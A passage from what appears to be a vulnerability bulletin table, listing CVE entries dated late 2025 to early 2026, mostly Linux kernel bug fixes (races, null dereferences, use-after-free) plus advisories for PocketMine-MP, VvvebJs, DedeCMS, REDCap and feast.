https://git.kernel.org/stable/c/f4032d615f90970d6c3ac1d9c0bce3351eb4445c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: message: mptlan: Fix use after free bug in mptlan_remove() due to race condition mptlan_probe() calls mpt_register_lan_device() which initializes the &priv->post_buckets_task workqueue. A call to mpt_lan_wake_post_buckets_task() will subsequently start the work. During driver unload in mptlan_remove() the following race may occur: CPU0 CPU1 |mpt_lan_post_receive_buckets_work() mptlan_remove() | free_netdev() | kfree(dev); | | | dev->mtu | //use Fix this by finishing the work prior to cleaning up in mptlan_remove(). [mkp: we really should remove mptlan instead of attempting to fix it] | 2025-12-30 | not yet calculated | CVE-2023-54310 | https://git.kernel.org/stable/c/92f869693d84e813895ff4d25363744575515423 https://git.kernel.org/stable/c/60c8645ad6f5b722615383d595d63b62b07a13c3 https://git.kernel.org/stable/c/410e610a96c52a7b41e2ab6c9ca60868d9acecce https://git.kernel.org/stable/c/697f92f8317e538d8409a0c95d6370eb40b34c05 https://git.kernel.org/stable/c/e84282efc87f2414839f6e15c31b4daa34ebaac1 https://git.kernel.org/stable/c/9c6da3b7f12528cd52c458b33496a098b838fcfc https://git.kernel.org/stable/c/48daa4a3015d859ee424948844ce3c12f2fe44e6 https://git.kernel.org/stable/c/f486893288f3e9b171b836f43853a6426515d800 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix deadlock when converting an inline directory in nojournal mode In no journal mode, ext4_finish_convert_inline_dir() can self-deadlock by calling ext4_handle_dirty_dirblock() when it already has taken the directory lock. There is a similar self-deadlock in ext4_incvert_inline_data_nolock() for data files which we'll fix at the same time. A simple reproducer demonstrating the problem: mke2fs -Fq -t ext2 -O inline_data -b 4k /dev/vdc 64 mount -t ext4 -o dirsync /dev/vdc /vdc cd /vdc mkdir file0 cd file0 touch file0 touch file1 attr -s BurnSpaceInEA -V abcde . touch supercalifragilisticexpialidocious | 2025-12-30 | not yet calculated | CVE-2023-54311 | https://git.kernel.org/stable/c/b4fa4768c9acff77245d672d855d2c88294850b1 https://git.kernel.org/stable/c/5f8b55136ad787aed2c184f7cb3e93772ae637a3 https://git.kernel.org/stable/c/640c8c365999c6f23447ac766437236ad88317c5 https://git.kernel.org/stable/c/665cc3ba50330049524c1d275bc840a8f28dde73 https://git.kernel.org/stable/c/0b1c4357bb21d9770451a1bdb8d419ea10bada88 https://git.kernel.org/stable/c/804de0c72cd473e186ca4e1f6287d45431b14e5a https://git.kernel.org/stable/c/f4ce24f54d9cca4f09a395f3eecce20d6bec4663 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: samples/bpf: Fix buffer overflow in tcp_basertt Using sizeof(nv) or strlen(nv)+1 is correct. | 2025-12-30 | not yet calculated | CVE-2023-54312 | https://git.kernel.org/stable/c/cf7514fedc25675e68b74941df28a883951e70fd https://git.kernel.org/stable/c/f394d204d64095d72ad9f03ff98f3f3743bf743a https://git.kernel.org/stable/c/bd3e880dce27d225598730d2bbb3dc05b443af22 https://git.kernel.org/stable/c/e92f61e0701ea780e57e1be8dbd1fbec5f42c09e https://git.kernel.org/stable/c/56c25f2763a16db4fa1b486e6a21dc246cd992bd https://git.kernel.org/stable/c/dfc004688518d24159606289c74d0c4e123e6436 https://git.kernel.org/stable/c/7c08d1b0d1f75117cf82aeaef49ba9f861b3fb59 https://git.kernel.org/stable/c/f4dea9689c5fea3d07170c2cb0703e216f1a0922 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ovl: fix null pointer dereference in ovl_get_acl_rcu() Following process: P1 P2 path_openat link_path_walk may_lookup inode_permission(rcu) ovl_permission acl_permission_check check_acl get_cached_acl_rcu ovl_get_inode_acl realinode = ovl_inode_real(ovl_inode) drop_cache __dentry_kill(ovl_dentry) iput(ovl_inode) ovl_destroy_inode(ovl_inode) dput(oi->__upperdentry) dentry_kill(upperdentry) dentry_unlink_inode upperdentry->d_inode = NULL ovl_inode_upper upperdentry = ovl_i_dentry_upper(ovl_inode) d_inode(upperdentry) // returns NULL IS_POSIXACL(realinode) // NULL pointer dereference , will trigger an null pointer dereference at realinode: [ 205.472797] BUG: kernel NULL pointer dereference, address: 0000000000000028 [ 205.476701] CPU: 2 PID: 2713 Comm: ls Not tainted 6.3.0-12064-g2edfa098e750-dirty #1216 [ 205.478754] RIP: 0010:do_ovl_get_acl+0x5d/0x300 [ 205.489584] Call Trace: [ 205.489812] <TASK> [ 205.490014] ovl_get_inode_acl+0x26/0x30 [ 205.490466] get_cached_acl_rcu+0x61/0xa0 [ 205.490908] generic_permission+0x1bf/0x4e0 [ 205.491447] ovl_permission+0x79/0x1b0 [ 205.491917] inode_permission+0x15e/0x2c0 [ 205.492425] link_path_walk+0x115/0x550 [ 205.493311] path_lookupat.isra.0+0xb2/0x200 [ 205.493803] filename_lookup+0xda/0x240 [ 205.495747] vfs_fstatat+0x7b/0xb0 Fetch a reproducer in [Link]. Use the helper ovl_i_path_realinode() to get realinode and then do non-nullptr checking. | 2025-12-30 | not yet calculated | CVE-2023-54313 | https://git.kernel.org/stable/c/d97481c7b2739a704848bb3c01f224dc71bdf78e https://git.kernel.org/stable/c/c4a5fb1ae5d3f02d3227afde2b9339994389463d https://git.kernel.org/stable/c/d536af163c53ce9f9bcfe87d2e9946f06f1a7ea4 https://git.kernel.org/stable/c/f4e19e595cc2e76a8a58413eb19d3d9c51328b53 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: af9005: Fix null-ptr-deref in af9005_i2c_xfer In af9005_i2c_xfer, msg is controlled by user. When msg[i].buf is null and msg[i].len is zero, former checks on msg[i].buf would be passed. Malicious data finally reach af9005_i2c_xfer. If accessing msg[i].buf[0] without sanity check, null ptr deref would happen. We add check on msg[i].len to prevent crash. Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()") | 2025-12-30 | not yet calculated | CVE-2023-54314 | https://git.kernel.org/stable/c/98c12abb275b75a98ff62de9466d21e4daa98536 https://git.kernel.org/stable/c/63d962ac7a52c0ff4cd09af2e284dce5e5955dfe https://git.kernel.org/stable/c/0c02eb70b1dd4ae9bb304ce6cdadbc6faba2b2e9 https://git.kernel.org/stable/c/c7e5ac737db25d7387fe517cb5207706782b6cf8 https://git.kernel.org/stable/c/033b0c0780adee32dde218179e9bc51d2525108f https://git.kernel.org/stable/c/abb6fd93e05e80668d2317fe1110bc99b05034c3 https://git.kernel.org/stable/c/e595ff350b2fd600823ee8491df7df693ae4b7c5 https://git.kernel.org/stable/c/f4ee84f27625ce1fdf41e8483fa0561a1b837d10 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/powernv/sriov: perform null check on iov before dereferencing iov Currently pointer iov is being dereferenced before the null check of iov which can lead to null pointer dereference errors. Fix this by moving the iov null check before the dereferencing. Detected using cppcheck static analysis: linux/arch/powerpc/platforms/powernv/pci-sriov.c:597:12: warning: Either the condition '!iov' is redundant or there is possible null pointer dereference: iov. [nullPointerRedundantCheck] num_vfs = iov->num_vfs; ^ | 2025-12-30 | not yet calculated | CVE-2023-54315 | https://git.kernel.org/stable/c/07c19c0ad4b07f4b598da369714de028f6a6a323 https://git.kernel.org/stable/c/d3a0d96c16e5f8d55e2c70163abda3c7c8328106 https://git.kernel.org/stable/c/d9a1aaea856002cb58dfb7c8d8770400fa1a0299 https://git.kernel.org/stable/c/6314465b88072a6b6f3b3c12a7898abe09095f95 https://git.kernel.org/stable/c/72990144e17e5e2cb378f1d9b10530b85b9bc382 https://git.kernel.org/stable/c/f4f913c980bc6abe0ccfe88fe3909c125afe4a2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: refscale: Fix uninitalized use of wait_queue_head_t Running the refscale test occasionally crashes the kernel with the following error: [ 8569.952896] BUG: unable to handle page fault for address: ffffffffffffffe8 [ 8569.952900] #PF: supervisor read access in kernel mode [ 8569.952902] #PF: error_code(0x0000) - not-present page [ 8569.952904] PGD c4b048067 P4D c4b049067 PUD c4b04b067 PMD 0 [ 8569.952910] Oops: 0000 [#1] PREEMPT_RT SMP NOPTI [ 8569.952916] Hardware name: Dell Inc. PowerEdge R750/0WMWCR, BIOS 1.2.4 05/28/2021 [ 8569.952917] RIP: 0010:prepare_to_wait_event+0x101/0x190 : [ 8569.952940] Call Trace: [ 8569.952941] <TASK> [ 8569.952944] ref_scale_reader+0x380/0x4a0 [refscale] [ 8569.952959] kthread+0x10e/0x130 [ 8569.952966] ret_from_fork+0x1f/0x30 [ 8569.952973] </TASK> The likely cause is that init_waitqueue_head() is called after the call to the torture_create_kthread() function that creates the ref_scale_reader kthread. Although this init_waitqueue_head() call will very likely complete before this kthread is created and starts running, it is possible that the calling kthread will be delayed between the calls to torture_create_kthread() and init_waitqueue_head(). In this case, the new kthread will use the waitqueue head before it is properly initialized, which is not good for the kernel's health and well-being. The above crash happened here: static inline void __add_wait_queue(...) { : if (!(wq->flags & WQ_FLAG_PRIORITY)) <=== Crash here The offset of flags from list_head entry in wait_queue_entry is -0x18. If reader_tasks[i].wq.head.next is NULL as allocated reader_task structure is zero initialized, the instruction will try to access address 0xffffffffffffffe8, which is exactly the fault address listed above. This commit therefore invokes init_waitqueue_head() before creating the kthread. | 2025-12-30 | not yet calculated | CVE-2023-54316 | https://git.kernel.org/stable/c/066fbd8bc981cf49923bf828b7b4092894df577f https://git.kernel.org/stable/c/ec9d118ad99dc6f1bc674c1e649c25533d89b9ba https://git.kernel.org/stable/c/e0322a255a2242dbe4686b6176b3c83dea490529 https://git.kernel.org/stable/c/e5de968a9032366198720eac4f368ed7e690b3ef https://git.kernel.org/stable/c/70a2856fd1d0a040c876ba9e3f89b949ae92e4dd https://git.kernel.org/stable/c/f5063e8948dad7f31adb007284a5d5038ae31bb8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm flakey: don't corrupt the zero page When we need to zero some range on a block device, the function __blkdev_issue_zero_pages submits a write bio with the bio vector pointing to the zero page. If we use dm-flakey with corrupt bio writes option, it will corrupt the content of the zero page which results in crashes of various userspace programs. Glibc assumes that memory returned by mmap is zeroed and it uses it for calloc implementation; if the newly mapped memory is not zeroed, calloc will return non-zeroed memory. Fix this bug by testing if the page is equal to ZERO_PAGE(0) and avoiding the corruption in this case. | 2025-12-30 | not yet calculated | CVE-2023-54317 | https://git.kernel.org/stable/c/b7f8892f672222dbfcc721f51edc03963212b249 https://git.kernel.org/stable/c/98e311be44dbe31ad9c42aa067b2359bac451fda https://git.kernel.org/stable/c/3c4a56ef7c538d16c1738ba0ccea9e7146105b5a https://git.kernel.org/stable/c/f2b478228bfdd11e358c5bc197561331f5d5c394 https://git.kernel.org/stable/c/ff60b2bb680ebcaf8890814dd51084a022891469 https://git.kernel.org/stable/c/be360c83f2d810493c04f999d69ec9152981e0c0 https://git.kernel.org/stable/c/63d31617883d64b43b0e2d529f0751f40713ecae https://git.kernel.org/stable/c/f50714b57aecb6b3dc81d578e295f86d9c73f078 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/smc: use smc_lgr_list.lock to protect smc_lgr_list.list iterate in smcr_port_add While doing smcr_port_add, there maybe linkgroup add into or delete from smc_lgr_list.list at the same time, which may result kernel crash. So, use smc_lgr_list.lock to protect smc_lgr_list.list iterate in smcr_port_add. The crash calltrace show below: BUG: kernel NULL pointer dereference, address: 0000000000000000 PGD 0 P4D 0 Oops: 0000 [#1] SMP NOPTI CPU: 0 PID: 559726 Comm: kworker/0:92 Kdump: loaded Tainted: G Hardware name: Alibaba Cloud Alibaba Cloud ECS, BIOS 449e491 04/01/2014 Workqueue: events smc_ib_port_event_work [smc] RIP: 0010:smcr_port_add+0xa6/0xf0 [smc] RSP: 0000:ffffa5a2c8f67de0 EFLAGS: 00010297 RAX: 0000000000000001 RBX: ffff9935e0650000 RCX: 0000000000000000 RDX: 0000000000000010 RSI: ffff9935e0654290 RDI: ffff9935c8560000 RBP: 0000000000000000 R08: 0000000000000000 R09: ffff9934c0401918 R10: 0000000000000000 R11: ffffffffb4a5c278 R12: ffff99364029aae4 R13: ffff99364029aa00 R14: 00000000ffffffed R15: ffff99364029ab08 FS: 0000000000000000(0000) GS:ffff994380600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 0000000f06a10003 CR4: 0000000002770ef0 PKRU: 55555554 Call Trace: smc_ib_port_event_work+0x18f/0x380 [smc] process_one_work+0x19b/0x340 worker_thread+0x30/0x370 ? process_one_work+0x340/0x340 kthread+0x114/0x130 ? __kthread_cancel_work+0x50/0x50 ret_from_fork+0x1f/0x30 | 2025-12-30 | not yet calculated | CVE-2023-54318 | https://git.kernel.org/stable/c/d1c6c93c27a4bf48006ab16cd9b38d85559d7645 https://git.kernel.org/stable/c/06b4934ab2b534bb92935c7601852066ebb9eab8 https://git.kernel.org/stable/c/70c8d17007dc4a07156b7da44509527990e569b3 https://git.kernel.org/stable/c/b717463610a27fc0b58484cfead7a623d5913e61 https://git.kernel.org/stable/c/f5146e3ef0a9eea405874b36178c19a4863b8989 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: at91-pio4: check return value of devm_kasprintf() devm_kasprintf() returns a pointer to dynamically allocated memory. Pointer could be NULL in case allocation fails. Check pointer validity. Identified with coccinelle (kmerr.cocci script). Depends-on: 1c4e5c470a56 ("pinctrl: at91: use devm_kasprintf() to avoid potential leaks") Depends-on: 5a8f9cf269e8 ("pinctrl: at91-pio4: use proper format specifier for unsigned int") | 2025-12-30 | not yet calculated | CVE-2023-54319 | https://git.kernel.org/stable/c/8d788f2ba830d6d32499b198c526d577c590eedf https://git.kernel.org/stable/c/3e8ce1d5a1a9d758b359e5c426543957f35991f8 https://git.kernel.org/stable/c/aa3932eb07392d626486428e2ffddc660658e22a https://git.kernel.org/stable/c/f3c7b95c9991dab02e616fc251b6c3516e0bd0ac https://git.kernel.org/stable/c/0a95dd17a73b7603818ad7c46c99d757232be331 https://git.kernel.org/stable/c/0af388fce352ed2ab383fd5d1a08db551ca15c38 https://git.kernel.org/stable/c/5bfd577cc728270d6cd7af6c652a1e7661f25487 https://git.kernel.org/stable/c/8a1fa202f47f39680a4305af744f499a324f8a03 https://git.kernel.org/stable/c/f6fd5d4ff8ca0b24cee1af4130bcb1fa96b61aa0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd: pmc: Fix memory leak in amd_pmc_stb_debugfs_open_v2() Function amd_pmc_stb_debugfs_open_v2() may be called when the STB debug mechanism enabled. When amd_pmc_send_cmd() fails, the 'buf' needs to be released. | 2025-12-30 | not yet calculated | CVE-2023-54320 | https://git.kernel.org/stable/c/d804adef7b23b22bb82e1b3dd113e9073cea9bc1 https://git.kernel.org/stable/c/f6e7ac4c35a28aef0be93b32c533ae678ad0b9e7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: driver core: fix potential null-ptr-deref in device_add() I got the following null-ptr-deref report while doing fault injection test: BUG: kernel NULL pointer dereference, address: 0000000000000058 CPU: 2 PID: 278 Comm: 37-i2c-ds2482 Tainted: G B W N 6.1.0-rc3+ RIP: 0010:klist_put+0x2d/0xd0 Call Trace: <TASK> klist_remove+0xf1/0x1c0 device_release_driver_internal+0x196/0x210 bus_remove_device+0x1bd/0x240 device_add+0xd3d/0x1100 w1_add_master_device+0x476/0x490 [wire] ds2482_probe+0x303/0x3e0 [ds2482] This is how it happened: w1_alloc_dev() // The dev->driver is set to w1_master_driver. memcpy(&dev->dev, device, sizeof(struct device)); device_add() bus_add_device() dpm_sysfs_add() // It fails, calls bus_remove_device. // error path bus_remove_device() // The dev->driver is not null, but driver is not bound. __device_release_driver() klist_remove(&dev->p->knode_driver) <-- It causes null-ptr-deref. // normal path bus_probe_device() // It's not called yet. device_bind_driver() If dev->driver is set, in the error path after calling bus_add_device() in device_add(), bus_remove_device() is called, then the device will be detached from driver. But device_bind_driver() is not called yet, so it causes null-ptr-deref while access the 'knode_driver'. To fix this, set dev->driver to null in the error path before calling bus_remove_device(). | 2025-12-30 | not yet calculated | CVE-2023-54321 | https://git.kernel.org/stable/c/2c59650d078b1b3f1ea50d5f8ee9fcc537dc02d3 https://git.kernel.org/stable/c/7cf515bf9e8c2908dc170ecf2df117162a16c9c5 https://git.kernel.org/stable/c/17982304806c5c10924e73f7ca5556e0d7378452 https://git.kernel.org/stable/c/f6837f34a34973ef6600c08195ed300e24e97317 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64: set __exception_irq_entry with __irq_entry as a default filter_irq_stacks() is supposed to cut entries which are related irq entries from its call stack. And in_irqentry_text() which is called by filter_irq_stacks() uses __irqentry_text_start/end symbol to find irq entries in callstack. But it doesn't work correctly as without "CONFIG_FUNCTION_GRAPH_TRACER", arm64 kernel doesn't include gic_handle_irq which is entry point of arm64 irq between __irqentry_text_start and __irqentry_text_end as we discussed in below link. https://lore.kernel.org/all/CACT4Y+aReMGLYua2rCLHgFpS9io5cZC04Q8GLs-uNmrn1ezxYQ@mail.gmail.com/#t This problem can makes unintentional deep call stack entries especially in KASAN enabled situation as below. [ 2479.383395]I[0:launcher-loader: 1719] Stack depot reached limit capacity [ 2479.383538]I[0:launcher-loader: 1719] WARNING: CPU: 0 PID: 1719 at lib/stackdepot.c:129 __stack_depot_save+0x464/0x46c [ 2479.385693]I[0:launcher-loader: 1719] pstate: 624000c5 (nZCv daIF +PAN -UAO +TCO -DIT -SSBS BTYPE=--) [ 2479.385724]I[0:launcher-loader: 1719] pc : __stack_depot_save+0x464/0x46c [ 2479.385751]I[0:launcher-loader: 1719] lr : __stack_depot_save+0x460/0x46c [ 2479.385774]I[0:launcher-loader: 1719] sp : ffffffc0080073c0 [ 2479.385793]I[0:launcher-loader: 1719] x29: ffffffc0080073e0 x28: ffffffd00b78a000 x27: 0000000000000000 [ 2479.385839]I[0:launcher-loader: 1719] x26: 000000000004d1dd x25: ffffff891474f000 x24: 00000000ca64d1dd [ 2479.385882]I[0:launcher-loader: 1719] x23: 0000000000000200 x22: 0000000000000220 x21: 0000000000000040 [ 2479.385925]I[0:launcher-loader: 1719] x20: ffffffc008007440 x19: 0000000000000000 x18: 0000000000000000 [ 2479.385969]I[0:launcher-loader: 1719] x17: 2065726568207475 x16: 000000000000005e x15: 2d2d2d2d2d2d2d20 [ 2479.386013]I[0:launcher-loader: 1719] x14: 5d39313731203a72 x13: 00000000002f6b30 x12: 00000000002f6af8 [ 2479.386057]I[0:launcher-loader: 1719] x11: 00000000ffffffff x10: ffffffb90aacf000 x9 : e8a74a6c16008800 [ 2479.386101]I[0:launcher-loader: 1719] x8 : e8a74a6c16008800 x7 : 00000000002f6b30 x6 : 00000000002f6af8 [ 2479.386145]I[0:launcher-loader: 1719] x5 : ffffffc0080070c8 x4 : ffffffd00b192380 x3 : ffffffd0092b313c [ 2479.386189]I[0:launcher-loader: 1719] x2 : 0000000000000001 x1 : 0000000000000004 x0 : 0000000000000022 [ 2479.386231]I[0:launcher-loader: 1719] Call trace: [ 2479.386248]I[0:launcher-loader: 1719] __stack_depot_save+0x464/0x46c [ 2479.386273]I[0:launcher-loader: 1719] kasan_save_stack+0x58/0x70 [ 2479.386303]I[0:launcher-loader: 1719] save_stack_info+0x34/0x138 [ 2479.386331]I[0:launcher-loader: 1719] kasan_save_free_info+0x18/0x24 [ 2479.386358]I[0:launcher-loader: 1719] ____kasan_slab_free+0x16c/0x170 [ 2479.386385]I[0:launcher-loader: 1719] __kasan_slab_free+0x10/0x20 [ 2479.386410]I[0:launcher-loader: 1719] kmem_cache_free+0x238/0x53c [ 2479.386435]I[0:launcher-loader: 1719] mempool_free_slab+0x1c/0x28 [ 2479.386460]I[0:launcher-loader: 1719] mempool_free+0x7c/0x1a0 [ 2479.386484]I[0:launcher-loader: 1719] bvec_free+0x34/0x80 [ 2479.386514]I[0:launcher-loader: 1719] bio_free+0x60/0x98 [ 2479.386540]I[0:launcher-loader: 1719] bio_put+0x50/0x21c [ 2479.386567]I[0:launcher-loader: 1719] f2fs_write_end_io+0x4ac/0x4d0 [ 2479.386594]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300 [ 2479.386622]I[0:launcher-loader: 1719] __dm_io_complete+0x324/0x37c [ 2479.386650]I[0:launcher-loader: 1719] dm_io_dec_pending+0x60/0xa4 [ 2479.386676]I[0:launcher-loader: 1719] clone_endio+0xf8/0x2f0 [ 2479.386700]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300 [ 2479.386727]I[0:launcher-loader: 1719] blk_update_request+0x258/0x63c [ 2479.386754]I[0:launcher-loader: 1719] scsi_end_request+0x50/0x304 [ 2479.386782]I[0:launcher-loader: 1719] scsi_io_completion+0x88/0x160 [ 2479.386808]I[0:launcher-loader: 1719] scsi_finish_command+0x17c/0x194 [ 2479.386833]I ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54322 | https://git.kernel.org/stable/c/c71d6934c6ac40a97146a410e0320768c7b1bb3c https://git.kernel.org/stable/c/0bd309f22663f3ee749bea0b6d70642c31a1c0a5 https://git.kernel.org/stable/c/d3b219e504fc5c5a25fa7c04c8589ff34baef9a8 https://git.kernel.org/stable/c/f6794950f0e5ba37e3bbedda4d6ab0aad7395dd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cxl/pmem: Fix nvdimm registration races A loop of the form: while true; do modprobe cxl_pci; modprobe -r cxl_pci; done ...fails with the following crash signature: BUG: kernel NULL pointer dereference, address: 0000000000000040 [..] RIP: 0010:cxl_internal_send_cmd+0x5/0xb0 [cxl_core] [..] Call Trace: <TASK> cxl_pmem_ctl+0x121/0x240 [cxl_pmem] nvdimm_get_config_data+0xd6/0x1a0 [libnvdimm] nd_label_data_init+0x135/0x7e0 [libnvdimm] nvdimm_probe+0xd6/0x1c0 [libnvdimm] nvdimm_bus_probe+0x7a/0x1e0 [libnvdimm] really_probe+0xde/0x380 __driver_probe_device+0x78/0x170 driver_probe_device+0x1f/0x90 __device_attach_driver+0x85/0x110 bus_for_each_drv+0x7d/0xc0 __device_attach+0xb4/0x1e0 bus_probe_device+0x9f/0xc0 device_add+0x445/0x9c0 nd_async_device_register+0xe/0x40 [libnvdimm] async_run_entry_fn+0x30/0x130 ...namely that the bottom half of async nvdimm device registration runs after the CXL has already torn down the context that cxl_pmem_ctl() needs. Unlike the ACPI NFIT case that benefits from launching multiple nvdimm device registrations in parallel from those listed in the table, CXL is already marked PROBE_PREFER_ASYNCHRONOUS. So provide for a synchronous registration path to preclude this scenario. | 2025-12-30 | not yet calculated | CVE-2023-54323 | https://git.kernel.org/stable/c/a371788d4f4a7f59eecd22644331d599979fd283 https://git.kernel.org/stable/c/18c65667fa9104780eeaa0dc1bc240f0c2094772 https://git.kernel.org/stable/c/f57aec443c24d2e8e1f3b5b4856aea12ddda4254 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: fix a race condition in retrieve_deps There's a race condition in the multipath target when retrieve_deps races with multipath_message calling dm_get_device and dm_put_device. retrieve_deps walks the list of open devices without holding any lock but multipath may add or remove devices to the list while it is running. The end result may be memory corruption or use-after-free memory access. See this description of a UAF with multipath_message(): https://listman.redhat.com/archives/dm-devel/2022-October/052373.html Fix this bug by introducing a new rw semaphore "devices_lock". We grab devices_lock for read in retrieve_deps and we grab it for write in dm_get_device and dm_put_device. | 2025-12-30 | not yet calculated | CVE-2023-54324 | https://git.kernel.org/stable/c/dbf1a719850577bb51fc7512a3972994b797a17b https://git.kernel.org/stable/c/38f6e5ae5d9ff4a4050ea6f7b543d5d5a4e087cf https://git.kernel.org/stable/c/f6007dce0cd35d634d9be91ef3515a6385dcee16 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: qat - fix out-of-bounds read When preparing an AER-CTR request, the driver copies the key provided by the user into a data structure that is accessible by the firmware. If the target device is QAT GEN4, the key size is rounded up by 16 since a rounded up size is expected by the device. If the key size is rounded up before the copy, the size used for copying the key might be bigger than the size of the region containing the key, causing an out-of-bounds read. Fix by doing the copy first and then update the keylen. This is to fix the following warning reported by KASAN: [ 138.150574] BUG: KASAN: global-out-of-bounds in qat_alg_skcipher_init_com.isra.0+0x197/0x250 [intel_qat] [ 138.150641] Read of size 32 at addr ffffffff88c402c0 by task cryptomgr_test/2340 [ 138.150651] CPU: 15 PID: 2340 Comm: cryptomgr_test Not tainted 6.2.0-rc1+ #45 [ 138.150659] Hardware name: Intel Corporation ArcherCity/ArcherCity, BIOS EGSDCRB1.86B.0087.D13.2208261706 08/26/2022 [ 138.150663] Call Trace: [ 138.150668] <TASK> [ 138.150922] kasan_check_range+0x13a/0x1c0 [ 138.150931] memcpy+0x1f/0x60 [ 138.150940] qat_alg_skcipher_init_com.isra.0+0x197/0x250 [intel_qat] [ 138.151006] qat_alg_skcipher_init_sessions+0xc1/0x240 [intel_qat] [ 138.151073] crypto_skcipher_setkey+0x82/0x160 [ 138.151085] ? prepare_keybuf+0xa2/0xd0 [ 138.151095] test_skcipher_vec_cfg+0x2b8/0x800 | 2025-12-30 | not yet calculated | CVE-2023-54325 | https://git.kernel.org/stable/c/7697139d5dfd491f4c495a914a1dd68f6e827a0f https://git.kernel.org/stable/c/dc3809f390357c8992f0a23083da934a20fef9af https://git.kernel.org/stable/c/2b1501f058245573a3aa6bf234d205dde1196184 https://git.kernel.org/stable/c/f6044cc3030e139f60c281386f28bda6e3049d66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: pci_endpoint_test: Free IRQs before removing the device In pci_endpoint_test_remove(), freeing the IRQs after removing the device creates a small race window for IRQs to be received with the test device memory already released, causing the IRQ handler to access invalid memory, resulting in an oops. Free the device IRQs before removing the device to avoid this issue. | 2025-12-30 | not yet calculated | CVE-2023-54326 | https://git.kernel.org/stable/c/fb7f8bdb886f2ebf35ee5edaf2bf5f02b063ddb7 https://git.kernel.org/stable/c/dd2210379205fcd23a9d8869b0cef90e3770577c https://git.kernel.org/stable/c/cdf9a7e2cdc7a5464e3cc6d0b715ba2b1d215521 https://git.kernel.org/stable/c/14bdee38e96c7d37ca15e7bea50411eee25fe315 https://git.kernel.org/stable/c/c2dba13bc0c62b79a3cbe4bfe5faa32231bf9b55 https://git.kernel.org/stable/c/38d12bcf4e2ce3d285eb29644a79a54f42040fab https://git.kernel.org/stable/c/f61b7634a3249d12b9daa36ffbdb9965b6f24c6c |
| pmmp--PocketMine-MP | PocketMine-MP versions prior to 4.18.1 contain an improper input validation vulnerability in inventory transaction handling. A remote attacker with a valid player session can request that the server drop more items than are available in the player's hotbar, triggering a server crash and resulting in denial of service. | 2025-12-31 | not yet calculated | CVE-2023-7332 | https://github.com/pmmp/PocketMine-MP/blob/4.18.1/changelogs/4.18.md https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-h87r-f4vc-mchv https://github.com/pmmp/PocketMine-MP/commit/5897476 https://www.vulncheck.com/advisories/pocketmine-mp-improper-validation-of-dropped-item-count-allows-remote-server-crash |
| Vvvebjs--givanz | A critical vulnerability has been identified in givanz VvvebJs 1.7.2, which allows both Server-Side Request Forgery (SSRF) and arbitrary file reading. The vulnerability stems from improper handling of user-supplied URLs in the "file_get_contents" function within the "save.php" file. | 2025-12-29 | not yet calculated | CVE-2024-25181 | https://gist.github.com/joaoviictorti/69cbae23d98fb9a1a4b3eee0c305c7de |
| Vvvebjs--givanz | givanz VvvebJs 1.7.2 suffers from a File Upload vulnerability via save.php. | 2025-12-29 | not yet calculated | CVE-2024-25182 | https://gist.github.com/joaoviictorti/ff6220d8ed6df77a0420f4413a1d9b8d |
| Vvvebjs--givanz | givanz VvvebJs 1.7.2 is vulnerable to Directory Traversal via scan.php. | 2025-12-29 | not yet calculated | CVE-2024-25183 | https://gist.github.com/joaoviictorti/db387ef5ea3d35482c5ad4598d945b2f |
| Vvvebjs--givanz | givanz VvvebJs 1.7.2 is vulnerable to Insecure File Upload. | 2025-12-29 | not yet calculated | CVE-2024-27480 | https://gist.github.com/joaoviictorti/abb2d1929c29d09c13c60bb45f28a8ff |
| DedeCMS--Dede | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /src/dede/makehtml_list_action.php. | 2025-12-29 | not yet calculated | CVE-2024-30855 | https://github.com/Limingqian123/cms/blob/main/1.md https://gist.github.com/Limingqian123/e90a1b86c02bd83d4ab07c08cad9a629 |
| REDCap--REDCap | REDCap 14.3.13 allows an attacker to enumerate usernames due to an observable discrepancy between login attempts. | 2026-01-02 | not yet calculated | CVE-2024-55374 | http://redcap.com https://github.com/T3slaa/CVE-2024-55374 |
| feast-dev--feast-dev/feast | A high-severity remote code execution vulnerability exists in feast-dev/feast version 0.53.0, specifically in the Kubernetes materializer job located at `feast/sdk/python/feast/infra/compute_engines/kubernetes/main.py`. The vulnerability arises from the use of `yaml.load(..., Loader=yaml.Loader)` to deserialize `/var/feast/feature_store.yaml` and `/var/feast/materialization_config.yaml`. This method allows for the instantiation of arbitrary Python objects, enabling an attacker with the ability to modify these YAML files to execute OS commands on the worker pod. This vulnerability can be exploited before the configuration is validated, potentially leading to cluster takeover, data poisoning, and supply-chain sabotage. | 2026-01-01 | not yet calculated | CVE-2025-11157 | https://huntr.com/bounties/46d4d585-b968-4a76-80ce-872bc5525564 https://github.com/feast-dev/feast/commit/b2e37ff37953b68ae833f6874ab5bc510a4ca5fb |
